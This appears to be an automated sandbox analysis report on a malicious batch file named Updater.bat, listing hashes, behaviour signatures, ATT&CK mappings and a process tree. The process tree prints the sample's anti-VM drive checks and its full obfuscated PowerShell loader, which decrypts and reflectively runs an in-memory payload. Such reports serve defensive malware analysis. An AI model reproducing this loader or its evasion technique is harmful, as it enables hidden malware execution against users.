94be9a2558718c11cb45dfcce1fdd1b55481a2059c7b88f81b28b596d51c46af

General

Target

Updater.bat
Size

7.4MB
MD5

817e65c6426d73b7f6fb6e86af91a870
SHA1

930959dd7f5458df58d4861dd284aed7ef1c1656
SHA256

94be9a2558718c11cb45dfcce1fdd1b55481a2059c7b88f81b28b596d51c46af
SHA512

bde32dc00e89aae044b369827e01594f6eacf7f769cdadb8ef8bf0a5a84be03d576496cb644bfbb162e1a005c06e131819f9d065346f39d0d9f8f2ddfeb1f852
SSDEEP

49152:z7XktsXaNQeRrnttyKsPDAxE42w/RLY1Z+GUaodePdybSGwMqErW2pGkHGymBslY:1

Score

8^/10

execution

Malware Config

Signatures

Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

Run Powershell and hide display window.

execution

PowerShell

T1059.001

pid	Process
2116	powershell.exe

Suspicious behavior: EnumeratesProcesses 1 IoCs

pid	Process
2116	powershell.exe

Suspicious use of AdjustPrivilegeToken 1 IoCs

description	pid	Process
Token: SeDebugPrivilege	2116	powershell.exe

Suspicious use of WriteProcessMemory 18 IoCs

description	pid	Process	procid_target
PID 1696 wrote to memory of 2376	1696	cmd.exe	31
PID 1696 wrote to memory of 2376	1696	cmd.exe	31
PID 1696 wrote to memory of 2376	1696	cmd.exe	31
PID 1696 wrote to memory of 2364	1696	cmd.exe	32
PID 1696 wrote to memory of 2364	1696	cmd.exe	32
PID 1696 wrote to memory of 2364	1696	cmd.exe	32
PID 1696 wrote to memory of 1264	1696	cmd.exe	33
PID 1696 wrote to memory of 1264	1696	cmd.exe	33
PID 1696 wrote to memory of 1264	1696	cmd.exe	33
PID 1696 wrote to memory of 3044	1696	cmd.exe	34
PID 1696 wrote to memory of 3044	1696	cmd.exe	34
PID 1696 wrote to memory of 3044	1696	cmd.exe	34
PID 1696 wrote to memory of 3056	1696	cmd.exe	35
PID 1696 wrote to memory of 3056	1696	cmd.exe	35
PID 1696 wrote to memory of 3056	1696	cmd.exe	35
PID 1696 wrote to memory of 2116	1696	cmd.exe	36
PID 1696 wrote to memory of 2116	1696	cmd.exe	36
PID 1696 wrote to memory of 2116	1696	cmd.exe	36

C:\Windows\system32\cmd.exe
cmd /c "C:\Users\Admin\AppData\Local\Temp\Updater.bat"
1⤵
- Suspicious use of WriteProcessMemory
PID:1696
- C:\Windows\system32\fsutil.exe
  fsutil fsinfo drives
  2⤵
  PID:2376
- C:\Windows\system32\findstr.exe
  findstr /i /c:"DADY HARDDISK" /c:"WDS100T2B0A" /c:"QEMU HARDDISK"
  2⤵
  PID:2364
- C:\Windows\system32\fsutil.exe
  fsutil fsinfo drives
  2⤵
  PID:1264
- C:\Windows\system32\findstr.exe
  findstr /i /c:"BOCHS_" /c:"BXPC___" /c:"QEMU" /c:"VirtualBox"
  2⤵
  PID:3044
- C:\Windows\system32\cmd.exe
  cmd.exe /c echo function jmdR($jGhj){ Invoke-Expression -Verbose -InformationAction Ignore -WarningAction Inquire -Debug '$umXL=[pfSpfypfspftepfmpf.Spfepfcupfrpfipftypf.pfCrpfyppftopfgrpfapfppfhpfypf.Apfepfspf]pf:pf:pfCpfrpfepfapftpfe(pf)pf;'.Replace('pf', ''); Invoke-Expression -InformationAction Ignore -Verbose '$umXL.Mcpocpdcpecp=[cpScpyscptcpemcp.cpScpeccpucpricptycp.Ccprycppcptcpocpgcpracppcphcpycp.cpCcpicppcphcpecprcpMocpdcpecp]cp:cp:cpCBcpCcp;'.Replace('cp', ''); Invoke-Expression -WarningAction Inquire -Verbose '$umXL.PNsaNsdNsdNsinNsgNs=[NsSNsysNstNseNsm.NsSNsecNsurNsitNsy.NsCNsrNsyNspNstoNsgNsrNsaNspNshNsyNs.NsPNsaNsdNsdiNsnNsgNsMNsoNsdNse]Ns:Ns:NsPKNsCNsS7Ns;'.Replace('Ns', ''); Invoke-Expression -InformationAction Ignore -WarningAction Inquire '$umXL.Khcehcyhc=hc[Shcyhcsthcehcm.hcChcohcnvhcehcrthc]:hc:FhcrohcmhcBhcahcshce6hc4hcShcthcrhcihcnhcg("Ihc4hc/hcRhciohcxhcFMhcmhcsvhcqhckhcrYhc/hcsJhcq3hcRVhcMChcYhczhcRhcHhcffhcEhcshcphcQhcNhcnhc3hcdhcmhcuhcPEhc=hc");'.Replace('hc', ''); Invoke-Expression -Debug -InformationAction Ignore '$umXL.IWsVWs=Ws[WsSyWssWsteWsmWs.CWsoWsnWsveWsrWst]Ws::WsFrWsomWsBWsaWssWseWs64WsSWstWsrWsiWsnWsg("6WsgWsuWs4WshcWshWsAyWsqWsESWsSWsxWswpWsfWsvWWsD8Wsg=Ws=");'.Replace('Ws', ''); $kUuX=$umXL.CreateDecryptor(); $ivVa=$kUuX.TransformFinalBlock($jGhj, 0, $jGhj.Length); $kUuX.Dispose(); $umXL.Dispose(); $ivVa;}function veyQ($jGhj){ Invoke-Expression -Verbose -WarningAction Inquire '$thJc=NHeeHewHe-HeObHejHeecHetHe SHeyHesHeteHemHe.IHeO.HeMeHemoHerHeyHeSHetHereHeaHemHe(,$jGhj);'.Replace('He', ''); Invoke-Expression -WarningAction Inquire -Verbose -Debug '$chnn=NHeeHewHe-HeObHejHeecHetHe SHeyHesHeteHemHe.IHeO.HeMeHemoHerHeyHeSHetHereHeaHemHe;'.Replace('He', ''); Invoke-Expression -InformationAction Ignore -WarningAction Inquire -Verbose '$xlNu=NMOeMOwMO-MOObMOjMOecMOtMO SMOyMOsMOteMOmMO.IMOO.MOCoMOmpMOrMOeMOsMOsMOioMOnMO.MOGMOZMOiMOpMOSMOtMOrMOeMOamMO($thJc, [MOIMOOMO.MOCoMOmMOprMOeMOssMOiMOoMOn.MOCMOomMOprMOesMOsiMOoMOnMOMMOoMOdeMO]MO:MO:MODMOeMOcMOoMOmMOpMOrMOesMOsMO);'.Replace('MO', ''); $xlNu.CopyTo($chnn); $xlNu.Dispose(); $thJc.Dispose(); $chnn.Dispose(); $chnn.ToArray();}function gtts($jGhj,$XRhN){ Invoke-Expression -WarningAction Inquire -Debug -Verbose -InformationAction Ignore '$QeTE=[kZSkZykZskZtekZmkZ.RkZekZflkZekZckZtikZokZn.kZAskZsekZmbkZlkZykZ]kZ:kZ:LkZokZakZdkZ([byte[]]$jGhj);'.Replace('kZ', ''); Invoke-Expression -Debug -WarningAction Inquire -InformationAction Ignore '$DFbC=$QeTE.ETUnTUtTUrTUyPTUoTUinTUtTU;'.Replace('TU', ''); Invoke-Expression -InformationAction Ignore -WarningAction Inquire '$DFbC.PQIPQnPQvPQokPQePQ($PQnPQulPQl, $XRhN);'.Replace('PQ', '');}$fVYD = 'C:\Users\Admin\AppData\Local\Temp\Updater.bat';$host.UI.RawUI.WindowTitle = $fVYD;$wbxK=[System.IO.File]::ReadAllText($fVYD).Split([Environment]::NewLine);foreach ($DJLX in $wbxK) { if ($DJLX.StartsWith('eXMtG')) { $pEQV=$DJLX.Substring(5); break; }}$YuMb=[string[]]$pEQV.Split('\');Invoke-Expression -Debug -Verbose -InformationAction Ignore -WarningAction Inquire '$cJc = veyQ (jmdR ([WhCWhoWhnWhveWhrWht]Wh:Wh:FWhrWhoWhmBWhaWhseWh64WhStWhriWhnWhg($YuMb[0].Replace("#", "/").Replace("@", "A"))));'.Replace('Wh', '');Invoke-Expression -InformationAction Ignore '$XmW = veyQ (jmdR ([WhCWhoWhnWhveWhrWht]Wh:Wh:FWhrWhoWhmBWhaWhseWh64WhStWhriWhnWhg($YuMb[1].Replace("#", "/").Replace("@", "A"))));'.Replace('Wh', '');Invoke-Expression -InformationAction Ignore -Debug -Verbose '$AoN = veyQ (jmdR ([WhCWhoWhnWhveWhrWht]Wh:Wh:FWhrWhoWhmBWhaWhseWh64WhStWhriWhnWhg($YuMb[2].Replace("#", "/").Replace("@", "A"))));'.Replace('Wh', '');gtts $cJc $null;gtts $XmW $null;gtts $AoN (,[string[]] (''));
  2⤵
  PID:3056
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell.exe -WindowStyle Hidden
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:2116

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

1

T1059

PowerShell

1

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

memory/2116-4-0x000007FEF58AE000-0x000007FEF58AF000-memory.dmp

Filesize
4KB

Download
memory/2116-5-0x000000001B510000-0x000000001B7F2000-memory.dmp

Filesize
2.9MB

Download
memory/2116-7-0x000007FEF55F0000-0x000007FEF5F8D000-memory.dmp

Filesize
9.6MB

Download
memory/2116-6-0x0000000002730000-0x0000000002738000-memory.dmp

Filesize
32KB

Download
memory/2116-9-0x000007FEF55F0000-0x000007FEF5F8D000-memory.dmp

Filesize
9.6MB

Download
memory/2116-8-0x000007FEF55F0000-0x000007FEF5F8D000-memory.dmp

Filesize
9.6MB

Download
memory/2116-10-0x000007FEF55F0000-0x000007FEF5F8D000-memory.dmp

Filesize
9.6MB

Download
memory/2116-11-0x000007FEF55F0000-0x000007FEF5F8D000-memory.dmp

Filesize
9.6MB

Download
memory/2116-12-0x000007FEF55F0000-0x000007FEF5F8D000-memory.dmp

Filesize
9.6MB

Download
memory/2116-13-0x000007FEF58AE000-0x000007FEF58AF000-memory.dmp

Filesize
4KB

Download

Analysis

Sharing